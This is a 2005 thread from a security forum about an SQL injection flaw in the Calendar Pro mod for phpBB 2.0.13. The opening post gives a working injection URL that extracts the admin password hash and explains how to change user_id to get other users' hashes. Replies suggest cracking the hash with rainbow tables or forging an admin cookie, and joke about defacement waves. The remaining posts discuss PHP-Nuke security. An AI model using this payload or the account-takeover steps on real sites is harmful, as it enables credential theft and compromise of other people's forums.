Waraxe IT Security Portal
Login or Register
November 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 52
Members: 0
Total: 52
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> Another one! Phpbb 2.0.13 + Calendar Mod
Post new topicReply to topic View previous topic :: View next topic
Another one! Phpbb 2.0.13 + Calendar Mod
PostPosted: Tue Apr 05, 2005 10:11 pm Reply with quote
murdock
Advanced user
Advanced user
Joined: Mar 16, 2005
Posts: 54




Another SQL injection discovered in another mod for phpbb 2.0.13, published at milw0rm's page and found by Cerebrums again.
Now seems to be the in the "Calendar Pro" mod (NOTE: Not the "Topic Calendar" mod!).

Here's the exploit:

http://www.milw0rm.com/id.php?id=910

But, once again, I prefer to simply paste the injection url in the browser:

Code:
http://[target]/[phpbb_folder]/cal_view_month.php?month=04&year=2005&category=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_users%20where%20user_id=2/*


This one give's the admin password hash, simply change the "user_id=" number to get the hash of another user.

I made a screenshot to view where appears the hash in the page if the exploit worked: Screenshot

Salut!
View user's profile Send private message
Re: Another one! Phpbb 2.0.13 + Calendar Mod
PostPosted: Wed Apr 06, 2005 3:08 am Reply with quote
xtremeshell
Regular user
Regular user
Joined: Mar 21, 2005
Posts: 6
Location: Somewhere In Hell !!




"This one give's the admin password hash, simply change the "user_id=" number to get the hash of another user. "
=================================================
After I have the admin hass, How do I crack it ?? ( Sorry for my stupid questions ) Should I use some software ?? such as JTR ?? Or Simply, how to exploit the admin panel with that admin hass ???

thX
View user's profile Send private message
PostPosted: Wed Apr 06, 2005 7:25 am Reply with quote
murdock
Advanced user
Advanced user
Joined: Mar 16, 2005
Posts: 54




You can try to crack it using Rainbow Tables, or simply making a cookie to log as admin (look at the first pinned topic in this forum!).
View user's profile Send private message
PostPosted: Wed Apr 06, 2005 8:11 am Reply with quote
xtremeshell
Regular user
Regular user
Joined: Mar 21, 2005
Posts: 6
Location: Somewhere In Hell !!




murdock wrote:
You can try to crack it using Rainbow Tables, or simply making a cookie to log as admin (look at the first pinned topic in this forum!).


Mm.... Rainbow Tables ?? Smile I'll find it.... And maybe I'll prefer to use the hash as a cookie maybe ?? hehehhehehehe.... Well, let's go !!

Thx for the rept Smile
View user's profile Send private message
PostPosted: Wed Apr 06, 2005 11:45 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Why cant people just put their time into phpBB itself. Theres not many sites that Ive seen that use the calender and download mods. Everyone is happy if there is an exploit for 2.0.13 itself... well except the victims.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Wed Apr 06, 2005 12:58 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




shai-tan wrote:
...
Everyone is happy if there is an exploit for 2.0.13 itself... well except the victims.
Laughing

Yeah, sure, that webmasters and admins are not pleased with new defacement waves Very Happy

Anyway - phpbb is allready very researched piece of software and new security holes are more and more hard to find Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Apr 06, 2005 1:15 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Yes well we are just going to have to wait till 3.0 comes out Twisted Evil ....I remember all the posts long ago about how secure 2.0.0 was going to be...... now look at it..... Laughing

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Wed Apr 06, 2005 2:28 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Yep, all the new, rewritten from scratch versions are good target for security audit, thats true Cool
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Apr 06, 2005 3:03 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




waraxe wrote:

Anyway - phpbb is allready very researched piece of software and new security holes are more and more hard to find Wink


yes, ive seen so many security holes beeing found at PHPbb, but now i think it more n more secure , because there are so many fix since it was born , lol

so , now the attacking will against the module in the phorum
like PHPnuke i think Rolling Eyes

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Fri Apr 08, 2005 12:25 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Yes phpNuke I think is in for a exploit spell. Its too big. Small and simple things are always the most secure Wink

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Apr 08, 2005 3:02 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




shai-tan wrote:
Yes phpNuke I think is in for a exploit spell. Its too big. Small and simple things are always the most secure Wink


Phpnuke is really amazing piece of software - very big and strong community, very ineffective and insecure coding (kinda bloatware). It contains many-many legacy code fragments, absolutely not used novadays. And whats more bad - all those add-ons and stuff - most of them are examples of insecure coding. There are good derivations of the phpnuke - like cpgnuke and stuff, but i think, its time to rewrite phpnuke from scratch - why not as version 8.0 Idea
By the way - i use phpnuke myself (as you all can see Cool ) and its my own derivation, so called "waraxe edition". I was optimizing nuke core engine and all the modules and perfomance was growing 200%-300%.
Just look at page generation times and compare it to other, classical nuke sites Very Happy
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Apr 08, 2005 3:19 pm Reply with quote
wyk
Regular user
Regular user
Joined: Mar 15, 2005
Posts: 10




waraxe, are you ready to share this derivation with others?
View user's profile Send private message Visit poster's website
PostPosted: Fri Apr 08, 2005 3:35 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




wyk wrote:
waraxe, are you ready to share this derivation with others?


It's on early stage. Still i have not finished modules "downloads", "weblinks" and "votes". And there is more stuff to finish. Maybe i will release it near future, let's see.
But one thing is sure - my nuke derivation is meant to be as secure as possible (for nuke Very Happy ). Right now there is implemented countermeasures against path disclosure, some obstacles against sql injections and all the suspicious activity and all the internal errors will be logged. And so far - from janyary 2005 - it is not fallen apart yet Smile
So seems that waraxe edition alpha release is coming out before summer 2005 Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Apr 08, 2005 4:40 pm Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




i just think about that sometimes coz we all know phpnuke has a big community, why dont phpnuke make a restriction of module, or maybe all the include module should have some 'security test' and permit from them

waraxe: about your own modification , i think it would be great if u can share it.. n better if u post one to "php nuke' developer so they could learn it.. cant wait for it

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sat Apr 09, 2005 4:53 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Yes it will be very popular. I want a beta now to be honest.
Why not call it Php-Waraxe-Nuke or just Waraxe-Nuke. Then we can tell Php-Nuke.org to shove 8.0 up their A*s

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
Another one! Phpbb 2.0.13 + Calendar Mod
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.050 Seconds